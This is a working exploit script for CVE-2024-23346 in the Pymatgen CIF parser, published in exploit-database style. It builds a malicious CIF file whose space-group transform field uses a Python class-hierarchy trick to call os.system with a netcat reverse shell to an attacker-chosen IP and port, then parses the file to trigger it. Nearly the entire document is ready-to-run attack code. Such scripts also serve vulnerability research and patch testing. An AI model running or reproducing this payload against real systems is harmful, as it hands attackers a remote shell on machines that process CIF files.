# Exploit Title : Pymatgen 2024.1 - Remote Code Execution (RCE)
# Google Dork : (not applicable)
# Date : 2024-11-13
# Exploit Author : Mohammed Idrees Banyamer
# Vendor Homepage : https ://pymatgen.org
# Software Link : https ://pypi.org /project /pymatgen/
# Version : 2024.1
# Tested on : Kali Linux 2024.1
# CVE : CVE-2024-23346


import os

# Function to create the malicious CIF file
def create_malicious_cif(ip, port):
    # Constructing the malicious CIF file with reverse shell payload
    malicious_cif = f"""
data_5yOhtAoR
_audit_creation_date            2024-11-13
_audit_creation_method          "CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {ip} {port} -e /bin/bash");0,0,0'

_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "
    """

    # Save to a file
    with open("vuln.cif", "w") as file:
        file.write(malicious_cif)
    print("[*] Malicious CIF file created: vuln.cif")

# Function to trigger the exploit by parsing the malicious CIF file
def exploit():
    ip = input("Enter your IP address for the reverse shell: ")
    port = input("Enter the port for the reverse shell to listen on: ")

    # Create the malicious CIF file
    create_malicious_cif(ip, port)

    # Trigger the Pymatgen CIF parser to parse the malicious file
    from pymatgen.io.cif import CifParser
    parser = CifParser("vuln.cif")
    structure = parser.parse_structures()

# Running the exploit
if __name__ == "__main__":
    exploit()